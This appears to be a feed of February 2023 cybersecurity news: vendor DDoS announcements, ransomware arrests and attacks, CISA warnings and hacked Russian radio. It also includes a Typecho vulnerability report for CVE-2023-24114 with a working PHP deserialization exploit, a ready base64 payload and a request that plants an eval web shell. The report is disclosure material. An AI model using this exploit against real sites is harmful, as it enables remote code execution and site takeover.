Upgrades boost Edgio's ability to mitigate sophisticated threats and safeguard applications and data.

**Singapore, 24 February 2023 –** Edgio, Inc. (Nasdaq: EGIO), the platform of choice for speed, security and simplicity at the edge, today announced significant enhancements to its Security platform, including a new DDoS scrubbing solution and improved Web Application and API Protection (WAAP) capabilities.

The new DDoS scrubbing solution provides dedicated DDoS mitigation capacity that protects all protocols and direct-to-origin attacks. It complements Edgio’s 250+ Tbps edge network to provide full spectrum DDoS protection. WAAP enhancements include advanced rule customizer, outbound data leak prevention, proxy detection, region code support and enhanced configurability. These new features provide customers with enhanced ability to detect and respond to emerging threats, ensuring confidentiality, integrity and availability of their data and applications.

"New security vulnerabilities are growing at an accelerated rate, and with this growth, it’s imperative that technology also evolve at a similarly exponential rate to stay ahead of the threats," said Ajay Kapur, Edgio’s Chief Technology Officer. "Edgio is doing just that with these product enhancements. Our security platform continues to provide a holistic solution for our customers that can not only mitigate the largest DDoS attacks, but also ensures the protection of critical web applications and APIs."

**Key Highlights/Facts**

*   DDoS attacks are on the rise.  In fact, according to **the 2022 Verizon DBIR (Data Breach Investigations Report)**, the number one security threat is a DDoS attack (46% of attacks) — and it’s growing every year. Therefore, it’s critical to have holistic protection from the full spectrum of DDoS attacks. With the addition of DDoS scrubbing solution, Edgio is able to protect all networks and applications, including direct-to-origin network attack against non-web applications via its dedicated scrubbing capacity utilizing standard protocol such as BGP and GRE tunnel. The combination of Edgio’s Layer 3-7 DDoS protection via its 250+ Tbps with the dedicated DDoS scrubbing provides businesses with a full spectrum protection to ensure maximum resiliency and uptime of their network and applications.

*   Outbound security rules make it easier for companies to prevent attackers from causing a data breach via exploiting known vulnerabilities. Traditionally, security rules only inspect inbound requests to mitigate application attacks from the outside in. Edgio is now adding the ability for security rules to scan outbound traffic as well, which prevents sensitive data and code leakage, providing an added layer of protection for confidential customer data and preventing the client from executing malicious code. Edgio is also adding the ability to detect and block requests originating from anonymous proxies, providing additional control on the access to customers’ applications.  The advanced rules customizer allows customers to control the sensitivity of individual security rules maximizing its accuracy while minimizing false positives. Enhanced configuration management enables developers to directly import and export configuration json via both API and UI to rapidly deploy protection for new applications.

*   Whether for compliance reasons or to prevent commerce to certain countries, Edgio enables clients to control access to their applications via advance access control rules. In the latest enhancements, Edgio is adding support for more granular regional control, down to the region or province level in its WAAP’s access rules and custom security rules, supporting ongoing compliance requirements in today’s changing geopolitical environment.

Edgio's mission is to help businesses protect their web applications and data through a holistic approach to security that also improves speed and reliability. Its advanced security solutions offer full-spectrum network and application DDoS protection, advanced web application and API protection (WAAP) with Dual WAAP Mode, and enterprise-grade bot management. For more information on Edgio's security offerings, click here.

**About Edgio**

Edgio (NASDAQ: EGIO)helps companies deliver online experiences and content faster, safer, and with more control. Our developer-friendly, globally scaled edge network, combined with our fully integrated application and media solutions, provide a single platform for the delivery of high-performing, secure web properties and streaming content. Through this fully integrated platform and end-to-end edge services, companies can deliver content quicker and more securely, thus boosting overall revenue and business value.To learn more, visit edg.io and follow us on Twitter, LinkedIn and Facebook.

Edgio Strengthens Security Offering With WAAP Enhancements and DDoS Scrubbing Solution

By Waqas
The suspects are allegedly involved in hacking, issuing threats, stealing data, laundering money, and extorting
This is a post from HackRead.com Read the original post: Ethical hacker among 3 arrested for blackmail and ransomware attacks

The ethical hacker reportedly works for the Dutch security organization, the Dutch Institute for Vulnerability Disclosure (DIVD).

Amsterdam’s cybercrime police arrested three individuals suspected of **launching ransomware attacks** against businesses in the Netherlands and worldwide. The suspects are allegedly involved in hacking, issuing threats, stealing data, laundering money, and extorting. These criminals extorted small and large businesses worldwide after hacking into their networks, generating €2.5 million.

**Suspects Details**

The detainees are all young males aged between 18 and 21. They were arrested on January 23rd, 2023 and are accused of stealing the private information of tens of millions of users from their targeted networks and blackmailing the victims for ransom.

The 21-year-old hailed from Zandvoort and was in contact with an 18-year-old suspect from Rotterdam; the third, also 18, was arrested in Naaldwijk. One of the suspects is an **ethical hacker** who works for the Dutch security organization, the Dutch Institute for Vulnerability Disclosure (**DIVD**).

The accused are detained in restrictive custody and can only contact their lawyer. The accused arrested in Zandvoort had 45,000 euros in cash and 550,000 euros worth of Bitcoin. Reportedly, the accused used Bitcoin to launder €2.5 million.

**Stolen Data**

**According to** Dutch media, thousands of businesses were targeted, including online stores, social media networks, training and educational institutions, software firms, hotels, and critical infrastructure and services-related entities.

Moreover, the accused damaged property worth millions of euros. The stolen data includes names, addresses, dates of birth, phone numbers, credit card numbers, passwords, bank account details, license plate numbers, passport data, and citizen identification numbers. The victims paid large sums to the hackers, sometimes as much as €700,000. 

**Investigations**

The investigation was launched in March 2021 by the Amsterdam Police Cybercrime Division after receiving a report from a prominent Dutch firm. The firm reported that its computer systems had been hacked and a trove of data had been stolen.

Dutch police **noted** that private and sensitive data had been stolen, and national and international businesses had become victims of hacking and data theft.

One of the victim organizations is Ticketcounter, which sells amusement park and zoo tickets online. Troy Hunt of **HaveIbeenPwned** also tweeted about the Ticketcounter data breach on March 1st, 2021.

> I've spent a bunch of time talking to Ticketcounter over the last week, and this is a really tough situation for them. The exposed database was human error; one bad mistake made in August last year that's now come back to bite them nearly 7 months on. https://t.co/u4xrMZDpGZ
> 
> — Troy Hunt (@troyhunt) March 1, 2021

Other victims include a reputed educational institution and a meal-delivery service. Further probing revealed that the hackers had invaded the computer systems of their targets and sent a threatening email, asking the victims to pay a **ransom in Bitcoin**; otherwise, they would destroy the company’s digital infrastructure or leak the data online. Many victims paid the ransom.

“According to what we know so far, the demand ranges from more than €100,000 to €700,000 and, in addition, the stolen information has often already been sold online,” investigators revealed.

**Dutch Police Tackle Cybercrime**

Although cybercrime in the Netherlands, like any other country, has increased in recent years, Dutch authorities are known for playing a major role in tackling it locally and globally. In fact, Dutch police were behind the shutdown and seizure of the infamous and one of the **largest dark web marketplaces Hansa**.

**Back in April 2020**, Dutch authorities took down 15 DDoS-for-hire services. It took them merely one week to complete the operation. Most recently, **in October 2022**, Dutch police were even able to successfully trick the Deadbolt ransomware gang into sharing decryption keys.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Ethical hacker among 3 arrested for blackmail and ransomware attacks

The Cybersecurity and Infrastructure Security Agency advises US and European nations to prepare for possible website attacks marking the Feb. 24 invasion of Ukraine by Russia.

The one-year anniversary of the start of the war in Ukraine could spur "disruptive and defacement attacks" on US and European websites, the US Cybersecurity and Infrastructure Security Agency (CISA) warned this week.

CISA said cyberattackers could use Feb. 24, which marks one year since the Russian invasion began, as an opportunity to wreak havoc and upheaval amid geopolitical tensions. The agency advised organizations to prepare accordingly and double down on their cybersecurity posture, referring to CISA's Shields Up cyber-defense recommendations, and its DDoS attack guidance.

"CISA urges organizations and individuals to increase their cyber vigilance in response to this potential threat," the agency said in its advisory this week.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

CISA: Beware of DDoS, Web Defacements on Anniversary of Russian Invasion of Ukraine

Preparation and cooperation helped to mitigate the worst of the digital damage, amid cyber sorties from all sides.

When Russia invaded Ukraine on Feb. 24, 2022, much discussion ensued about how the war would be both cyber and kinetic. A year later, the consensus seems to be that while there was a lot of cyberattack activity, it wasn't as destructive as many had feared. That was partly due to various governments and security companies helping to identify and block attacks.

Between February 2022 and February 2023, an average of 10% of all online traffic to Ukraine was mitigations of potential attacks, Cloudflare said in its analysis of the Russian invasion's impact on theUkrainian Internet. Cloudflare protected Ukrainian Web applications by filtering and monitoring HTTP traffic to block malicious attacks, including distributed denial-of-service (DDoS) attacks.

On Oct. 29, DDoS attack traffic constituted 39% of total traffic to Cloudflare's Ukrainian customers.

The company shared a graph showing the daily percentage of application layer traffic to Ukraine that Cloudflare mitigated as potential attacks using its Web application firewall (WAF). In early March, 30% of all traffic was mitigated. After a fairly quiet summer, attack activity ticked back up in early September, during the Ukrainian counteroffensive in east and south Ukraine.

More specifically, 14% of total traffic from Ukraine was mitigated as potential attacks, while 10% of total traffic to Ukraine was mitigated as potential attacks in the past 12 months.

Mitigated application-layer threats blocked by Cloudflare's WAF were 105% higher on Monday, Feb. 28, 2022 — four days after the invasion — compared with the Monday before, Feb. 21, 2022. By March 8, that figure was 1,300%.

**What Came Out of 'Shields Up'**

In anticipation of Russian cyberattacks against Ukrainian targets and against organizations in countries allied with Ukraine, the US Cybersecurity and Infrastructure Security Agency (CISA) urged organizations to share information that could help mitigate threats. "Every organization — large and small — must be prepared to respond to disruptive cyber incidents," CISA said.

While sharing threat intelligence indubitably helped, the nature of the attacks were also less sophisticated or destructive than feared.

Cisco Talos researchers have been monitoring critical infrastructure customers to identify threats and remediate attacks. While there were a lot of concerns about destructive malware, what Talos is seeing — and blocking — a lot of is credentials harvesting, says Nick Biasini, Cisco Talos' head of outreach. Attackers are not resorting to highly sophisticated tactics but rather are employing mundane and recognizable methods to try to gain access to networks and accounts, he says.

**Impact on Critical Infrastructure**

Cloudflare's analysis of Ukraine's Internet traffic shows peaks and drops in usage corresponding with military activity. For example, the city of Chernihiv had a significant drop in traffic the first week of the war and residual traffic by mid-March, with traffic picking up after the Russian retreat in early April, Cloudflare noted. In the fall, Russian military units started targeting Ukrainian critical infrastructure, causing widespread power outages and Internet blackouts. Some of these strikes caused as much as a 50% decrease in Internet traffic, according to Cloudflare's analysis. The disruptions often lasted only a day or two, "further emphasizing the ongoing impact of the conflict on Ukraine's infrastructure," Cloudflare noted.

"Throughout the rest of the year and into 2023, Ukraine has continued to face intermittent Internet disruptions," Cloudflare also wrote.

**Ripple Effects Around the World**

Security leaders in East Asia are carefully watching how the war between Russia and Ukraine unfolds, as a lot of the geopolitical tensions and rhetoric are similar to the long-simmering situation between China and Taiwan. Organizations are "wondering what kind of disruptive attacks to expect" and how the war in Ukraine could affect the Taiwan situation, says Mihoko Matsubara, chief cybersecurity strategist at NTT. There has already been some activity, although it has been of the "cyber nuisance" variety, rather than destruction, Matsubara says. East Asian companies are already seeing DDoS attacks, defacements, and disinformation campaigns, she says.

Matsubara was careful not to downplay the seriousness of the attacks, as they are still disruptive to organizations. NTT has also seen some wiper attacks used to disrupt humanitarian aid efforts, which may be a harbinger of activities to come.

**Bad Actors Get Political**

Cybercriminals have been expressing their own opinions — and political allegiances — about the war. For example, Coalition's latest "Cyber Threat Index" report dug into attacks against databases exposed to the Internet. Coalition observed a total 264,408 IP addresses running MongoDB instances in 2022, and 68,423 of them — or 26% — were compromised. Coalition found a handful of compromised MongoDB servers where the attackers renamed the databases to SLAVA\_UKRAINI, or "Glory to Ukraine!"

"Threat actor activity is often shaped by fluctuations in economic conditions," noted the team from Kroll's Cyber Risk practice in the latest "Threat Landscape" report. "Due to the continued market volatility across the globe and the ongoing war on Ukraine, it is likely that the unstable circumstances in which attackers thrive will persist in 2023."

Evaluating the Cyberwar Set Off by Russian Invasion of Ukraine

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging organizations and individuals to increase their cyber vigilance, as Russia's military invasion of Ukraine officially enters one year.
"CISA assesses that the United States and European nations may experience disruptive and defacement attacks against websites in an attempt to sow chaos and societal discord on February 24,

Cyber War / Cybersecurity

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging organizations and individuals to increase their cyber vigilance, as Russia's military invasion of Ukraine officially enters one year.

"CISA assesses that the United States and European nations may experience disruptive and defacement attacks against websites in an attempt to sow chaos and societal discord on February 24, 2023, the anniversary of Russia's 2022 invasion of Ukraine," the agency said.

To that end, CISA is recommending that organizations implement cybersecurity best practices, increase preparedness, and take proactive steps to reduce the likelihood and impact of distributed denial-of-service (DDoS) attacks.

The advisory comes as the Computer Emergency Response Team of Ukraine (CERT-UA) revealed that Russian nation-state hackers breached government websites and planted backdoors as far back as December 2021.

CERT-UA attributed the activity to a threat actor it tracks as UAC-0056, which is also known under the monikers DEV-0586, Ember Bear, Nodaria, TA471, and UNC2589.

The attacks entail the use of web shells as well as a number of custom backdoors like CredPump, HoaxApe, and HoaxPen, adding to the group's arsenal of tools like WhisperGate, SaintBot, OutSteel, GraphSteel, GrimPlant, and more recently, Graphiron.

The agency, in a related advisory, also disclosed a phishing campaign bearing RAR archives that lead to the deployment of the Remos remote control and surveillance software. It's been linked to a threat actor known as UAC-0050 (and UAC-0096).

The findings come as Fortinet reported a 53% increase in destructive wiper attacks from Q3 to Q4 2022, primarily fueled by Russia's state-sponsored hackers striking an unprecedented variety of data-destroying malware at Ukraine.

"These new strains are increasingly being picked up by cybercriminal groups and used throughout the growing cybercrime-as-a-service (CaaS) network," the security vendor said.

"Cybercriminals are also now developing their own wiper malware which is being used readily across CaaS organizations, meaning that the threat of wiper malware is more widespread than ever and all organizations are a potential target, not just those based in Ukraine or surrounding countries."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Sounds Alarm on Cybersecurity Threats Amid Russia's Invasion Anniversary

By Deeba Ahmed
Several radio stations in Russia were reportedly hacked to send fake missile alerts across the country, the government has claimed.
This is a post from HackRead.com Read the original post: Russian Radio Stations Hacked with Fake Missile Alerts

According to local media, a female voice rendered the fake alerts from several radio stations, including Yumor FM, Relax FM, Comedy Radio, Humor FM, and Avatoradio. The false warning announced an air raid and requested the listeners to seek shelter quickly.

Millions of Russian citizens in over a dozen cities were baffled to hear unusual radio alerts, sirens, and text messages this Wednesday morning. These warnings were about missile strikes and air raids on Russia.

However, the Russian government’s Ministry of Emergency Situations later announced that these were fake warnings and blamed hackers for airing false alerts on commercial radio stations.

According to local media, a female voice rendered the fake alerts from several radio stations, including Yumor FM, Relax FM, Comedy Radio, Humor FM, and Avatoradio. The false warning announced an air raid and requested the listeners to seek shelter quickly.

“Attention, an air raid warning is being announced. Go to the shelter immediately. Attention, Attention, the threat of a missile strike.”

> Today, radio stations across Russia including in Volgograd, Stavropol, Moscow region broadcasted air raid warnings (the video is reportedly from Belgorod)
> 
> Acc to the Ministry of Emergency Situations this messages is fake and was caused by a hacker attack https://t.co/Cd7bGeVVAx pic.twitter.com/wfuIjGQkyZ
> 
> — Oleg Shakirov (@shakirov2036) February 22, 2023

These bogus warnings were broadcast in ten cities, including Kazan, Tyumen, Pyatigorsk, Nizhny Novgorod, Voronezh, Magnitogorsk, Novouralsk, Ufa, and Stary Oskol. Loud sirens followed these warnings, and civilians were urged to seek out air raid shelters. Some people recorded these false warnings on camera.

Locals in the cities where the warnings were broadcast, such as the Kurgan and Belgorod regions, promptly informed citizens that these were false warnings. The ministry noted that the warnings were caused by an attack on a satellite operator’s infrastructure.

Moreover, government officials stated that an unauthorized “tie-in is going in the air,” clarifying that the alarm signals were fake. Authorities claim that the perpetrators could be linked to the Kyiv regime.

*   Anonymous sent 7m texts to Russians; hacked security cams
*   Anonymous hacked 90% of Russian misconfigured databases
*   Anonymous hacked Russian TV, streaming services for Ukraine
*   Anonymous hacks Russian printers to send anti-war messages
*   Anonymous hacked Russian Yandex taxi app causing traffic jam

Earlier, a Denial of Service attack (DDoS attack) disrupted Russian President Vladimir Putin’s address to the nation on state media sites. Ukrainian hackers claimed responsibility for the attack.

“As a result of a hacker attack on the servers of some commercial radio stations in some regions of the country, information was broadcast about an alleged announcement of an air raid warning and a threat of a missile strike,” the ministry’s statement read.

It is worth noting that most stations airing these alerts are owned by Russia’s leading media company, Gazprom-Media. Furthermore, the alerts were aired just two days before the first anniversary of the Russian invasion of Ukraine.

Russian Radio Stations Hacked with Fake Missile Alerts

Categories: News
Categories: Ransomware
Tags: Lehigh Valley Health Network

Tags:  LVHN

Tags:  BlackCat

Tags:  ALPHV

Tags:  Noberus

Tags:  ransomware

Tags:  leak site

Tags:  DDoS

The Lehigh Valley Health Network stated it was the target of a cybersecurity attack by a ransomware gang known as BlackCat



(Read more...)




The post BlackCat ransomware targets another healthcare facility appeared first on Malwarebytes Labs.

Posted: February 23, 2023 by

In a statement issued Monday morning, Lehigh Valley Health Network said it had been the target of a cyberattack attributed to a ransomware gang known as BlackCat. The Network is made up of 13 hospital campuses, as well as other health facilities, and is based in Pennsylvania.

**BlackCat**

The ransomware-as-a-service (RaaS) group BlackCat, also known as ALPHV and Noberus, is currently one of the most active groups, and has been associated with Russia. In our recent February ransomware review it came in second after Lockbit, based on the number of known attacks.

In December, 2022, the Office of Information Security and Health Sector Cybersecurity Coordination Center issued an extensive Analyst Note which identified BlackCat as a "relatively new but highly-capable" ransomware threat to health care providers.

BlackCat uses double extortion and sometimes triple extortion to make victims pay the ransom. That means that besides encrypting files, the gang also threaten to publish the stolen data on a so-called “leak site”, and at times, threaten their victims with DDoS attacks.

**The attack**

According to the health network, the attack targeted the network supporting Delta Medix, a physician practice in Lackawanna County. The unauthorized activity was detected on February 6, 2023 and involved a computer system used for patient images for radiation oncology treatment and other sensitive information.

The health network is investigating the full scope of the attack, but says services have not been disrupted, although its websites seem to be offline for the moment. It was unable to say yet whether any specific patient's personal or sensitive information was compromised, but promised to inform any affected individuals if it discovers that was the case.

**No ransom**

The Lehigh Valley Health Network said it has refused to pay a ransom, but did not disclose the demanded amount. According to the US Department of Health and Human Services (HHS) The BlackCat group has demanded ransoms as high as $1.5 million in previous cybersecurity attacks against the healthcare sector.

Dr. Brian Nester, the health network's president and CEO said:

> "BlackCat demanded a ransom payment, but LVHN refused to pay this criminal enterprise. We understand that BlackCat has targeted other organizations in the academic and health care sectors. We are continuing to work closely with our cybersecurity experts to evaluate the information involved and will provide notices to individuals as required as soon as possible. Attacks like this are reprehensible and we are dedicating appropriate resources to respond to this incident."

Recent reports indicated that ransomware revenue went significantly down over 2022, likely due to companies’ increasing unwillingness to meet the ransom demands.

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Write an incident response plan**. The period after a ransomware attack can be chaotic. Make a plan that outlines how you'll isolate an outbreak, communicate with stakeholders, and restore your systems.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

BlackCat ransomware targets another healthcare facility

typecho 1.1/17.10.30 was discovered to contain a remote code execution (RCE) vulnerability via install.php.

**List of Vulnerable path**

Vulnerable path /install.php  
Lines 60-69 of the "install.php" catch the error but do nothing,so bypass the line 65's "exit".  
  
It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.  
We can simulate this situation by breakpoint debugging.Set the breakpoint on the line 60,then cut off the connection with the database.(such as phpstorm + phpstudy and so on)  
  
  
Lines 74-87 of the "install.php",we can fake the reffer bypass the second "exit".we can set the reffer "http://localhost/".  
  
Line 291 of the "install.php" has a function "unserialize",it can be exploited maliciously.  
The parameters come from line 83 of the "/var/Typecho/Cookie.php".  
  
Line 420 of the "install.php" triggeres function "\_\_toString".  
Line 223 of the "/var/Typecho/Feed.php" has function "\_\_toString"  
  
  
  
Line 290 of the "/var/Typecho/Feed.php" triggeres function "\_\_get".  
Line 270 of the "/var/Typecho/Request.php" has function "\_\_get"  
  
  
  
We can exploit function "call\_user\_func" to Remote Code Execute.

**Vulnerability exploitation process:**

It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.Of course,we can send network packets repeatedly to wait for it.  
  
The "ok" will be sent if it is success because of the POC.Then test the webshell.  

**POC code:**

<?php
class Typecho\_Request{
    private $\_params\= array('screenName'\=> 'php -r "echo \\'ok\\';file\_put\_contents(\\'cmd.php\\', \\'<?php eval($\_POST\[\\"youyou\\"\]); ?>\\');"');
    private $\_filter\= array('system');
}
class Typecho\_Feed{
    private $\_items\=array();
    private $\_type\='ATOM 1.0';
    public function \_\_construct()
    {
        $items\['author'\]=new Typecho\_Request();
        $this\->\_items\[0\]=$items;
    }
}
$config\['prefix'\] = new Typecho\_Feed();;
$payload = base64\_encode(serialize($config));
echo $payload;

URL: http://localhost/install.php?start=1
POST Data: delete=true&\_\_typecho\_config=YToxOntzOjY6InByZWZpeCI7TzoxMjoiVHlwZWNob19GZWVkIjoyOntzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo4NjoicGhwIC1yICJlY2hvICdvayc7ZmlsZV9wdXRfY29udGVudHMoJ2NtZC5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbXCJ5b3V5b3VcIl0pOyA/PicpOyIiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7fX0\=
Reffer: http://localhost/

CVE-2023-24114: the typecho1.1/17.10.30 has a Remote Code Execute Vulnerability · Issue #1523 · typecho/typecho

Attackers are now using multiple types of distributed denial-of-service (DDoS) attacks to take down sites. Here are some ways to defend and protect.

Distributed denial-of-service (DDoS) attacks occur when an individual device, known as a bot, or a network of devices, known as a botnet, is infected with malware. These bots or botnets flood websites with increased traffic volumes over a period of hours or even days in an attempt to take services offline. Recently, hacktivist groups have begun leveraging DDoS attacks to extort site owners for financial, competitive advantage, or political reasons. This can represent a serious threat for enterprise businesses.

Planning and preparation are key to developing an effective DDoS defense. But first you need to understand how these attacks work.

**DDoS Attack Types**

New DDoS attack vectors emerge every day thanks to innovative artificial intelligence (AI) technology and a growing cybercrime ecosystem. But in general, there are three main types of DDoS attacks, each of which encompasses a variety of cyberattacks. The first is known as a volumetric attack, which primarily focuses on bandwidth and is designed to overwhelm the network layer with traffic. For example, domain name server (DNS) amplification attacks leverage open DNS servers to flood a target with DNS response traffic.

Another type of DDoS is a protocol attack, which exploits weaknesses in Layers 3 and 4 of the protocol stack, targeting critical resources. For example, synchronization packet floods (SYN) will consume all available server resources as a way to make servers unavailable.

Finally, a resource layer attack disrupts data transmission between hosts by targeting web application packets. For example, SQL injection attacks will insert malicious code into strings. These strings are subsequently passed to a SQL server to be parsed and executed.

And while these categories can cover a broad range of DDoS attacks, security teams also need to be aware that cybercriminals can compromise their networks by using multiple attack types from different categories.

**Protecting Against, Responding to DDoS Attacks**

When websites or servers go down, companies risk losing sales and customers, incurring high recovery costs and damaging their reputations. In some regions and industry sectors, they may even be subject to penalties and fines. Here are four ways to respond to DDoS attacks.

**1\. Evaluate Your Risks and Make Sure You're Protected**

The first step is to identify the publicly exposed applications within your organization. Make sure you note typical application behavior patterns so you can identify anomalies and respond accordingly. Because DDoS attacks typically spike during peak business seasons, such as the holidays, organizations should look for scalable DDoS protection services with advanced mitigation capabilities. Specific service features include traffic monitoring; adaptive real-time tuning; DDoS protection telemetry, monitoring, and alerting; and access to a rapid response team.

**2\. Get Prepared With a DDoS Response Strategy**

One proactive measure that all companies should take is to develop a rapid response strategy. Start by forming a DDoS rapid response team that knows how to identify, mitigate, and monitor attacks. This team should also be able to work with internal stakeholders and customers.

**3\. Identify Potential Weaknesses**

Use attack simulations to understand how your services will respond in the event of an attack. These simulations should confirm that your services or applications will be able to function normally without disrupting users' experiences, and they should happen during off-business hours or within a staging environment to minimize business impact. When conducting an attack simulation, make sure you identify potential technology and process gaps to inform your DDoS response strategy.

**4\. Respond, Learn, Adapt In the Face of Attacks**

In the event of an actual DDoS attack, contact an established DDoS response team or other technical professionals to conduct your attack investigation and post-attack analysis. This retrospective analysis is especially critical as it can help to clarify whether service or user disruptions were due to a lack of scalable architecture. Focus your evaluation on which applications or services experienced the greatest disruptions, as well as the effectiveness of your DDoS response strategy.

Of course, DDoS attacks are just one type of emerging cyberthreat. For more information on ongoing cybersecurity developments and best practices, check out Microsoft Security Insider.

4 Tips to Guard Against DDoS Attacks

At the beginning of January, Gcore faced an incident involving several L3/L4 DDoS attacks with a peak volume of 650 Gbps. Attackers exploited over 2000 servers belonging to one of the top three cloud providers worldwide and targeted a client who was using a free CDN plan. However, due to Gcore’s distribution of infrastructure and a large number of peering partners, the attacks were mitigated,

Server Security / DDoS Attack

At the beginning of January, Gcore faced an incident involving several L3/L4 DDoS attacks with a peak volume of 650 Gbps. Attackers exploited over 2000 servers belonging to one of the top three cloud providers worldwide and targeted a client who was using a free CDN plan. However, due to Gcore's distribution of infrastructure and a large number of peering partners, the attacks were mitigated, and the client's web application remained available.

****Why was mitigating these attacks so significant?****

**1\. These attacks were significant because they exceeded the average bandwidth of similar attacks by 60×.** The performed attacks relate to volume-based attacks targeted to saturate the attacked application's bandwidth in order to overflow it. Measuring total volume (bps)—rather than the number of requests—is the way these attacks are usually tabulated.

The average bandwidth of this attack type is generally in the tens of Gbps (about 10 Gbps). Therefore, the specified attacks (at 650 Gbps) exceeded the average value by 60 times. Attacks of this volume are rare and are of particular interest to security experts.

Additionally, this value (650 Gbps) is comparable to the record DDoS attack on the largest Minecraft server (2.4 Tbps), only one-fourth as massive.

**2\. The client being attacked was using a CDN plan without additional DDoS protection.** When clients use Gcore's CDN (as part of the Edge Network), the malicious traffic of the L3/L4 attacks directly affects only its infrastructure (it serves as a filter), not the targeted clients' servers. The negative impact falls on the capacity and connectivity of the infrastructure When a CDN is powerful enough, it can protect clients against L3/L4 attacks—even when accessed using a free plan.

****What were the technical specifications of the attacks?****

The duration of the incident was 15 minutes, and at its peak, it reached over 650 Gbps. A possible reason why the incident took so long is that the attackers weighed the ineffectiveness of the attacks (the client application kept running) against their high cost.

The incident consisted of three attacks with different vectors. They are marked with traffic peaks on the diagram below:

1.  **UDP flood attack (~650 Gbps).** Hundreds of millions of UDP packets were sent to the target server to consume the bandwidth of the application and cause its unavailability. Attacks of this vector use a lack of requirements of UDP connection establishment: the attackers can send packets with any data (it increases the volume) and use spoofed IP addresses (it makes it difficult to find the sender).
2.  **TCP ACK flood attack (~600 Gbps).** A large number of packets with the ACK flag were sent to the target server to overflow it. Attacks of this vector are based on the fact that the junk TCP packets do not include a payload, but the server is forced to process them, and it may not have enough resources to handle requests from real end users. A CDN's protection system is capable of filtering packets and not forwarding them to the server if they do not contain payloads and are not bound to an open TCP session.
3.  **A mix of TCP and UDP (~600 Gbps).** A custom variation of the previous two types of attacks.

The distinctiveness of the incident was that the attacks were performed from multiple non-spoofed IP addresses. This allowed specialists to identify that the attackers used 2,143 servers in 44 different regions, and all of the servers belonged to a single public cloud provider. Utilizing Anycast allowed Gcore to absorb the attack 100% over peering connections with this provider.

Sankey diagram showing the source and flow of the attack. Names of the locations from the first column are associated with one of the top 3 cloud providers.

****Why did the attacks not affect the client?****

**1\. Gcore's connectivity through peering with many locations played a key role in mitigating the attacks.** Gcore has over 11,000 peering partners (ISPs), and these partners connect their networks using cables and provide each other with access to traffic originating from their networks. These connections allow for bypassing the public internet and directly absorbing traffic from the peering partners. Additionally, this traffic is either free of charge or costs much less than traffic on the public internet. This low cost makes it possible to protect customer traffic on a free plan.

In the context of the DDoS attack that occurred, the level of connectivity greatly benefited the efficacy of mitigation. Gcore and the cloud provider used to launch the attack are peering partners, so while the attack was happening, Gcore was able to ingest most of the traffic over the cloud provider's private network. This greatly reduced the amount of traffic that needed to be handled by the public internet.

Private peering also enables more accurate filtering and better attack visibility, which leads to more efficient attack mitigation.

**2\. Gcore's large capacity, due to the placement of servers in many data centers, also played a role.** Gcore's edge servers are present in over 140 points of presence and are based on high-performance 3rd generation Intel® Xeon® Scalable processors.

The overall network capacity is over 110 Tbps. With over 500 servers located in data centers worldwide, the company is able to withstand large-scale DDoS attacks. So, the 650 Gbps of traffic could be distributed across the network, and each particular server would only receive 1-2 Gbps, which is an insignificant load.

****Security trends****

According to Gcore's experience, DDoS attacks will continue to grow year over year. In 2021, the attacks reached 300 Gbps, and by 2022, they had increased to 700 Gbps. Therefore, even small and medium-sized businesses need to use distributed content delivery networks such as the CDN and Cloud to protect against DDoS attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#ddos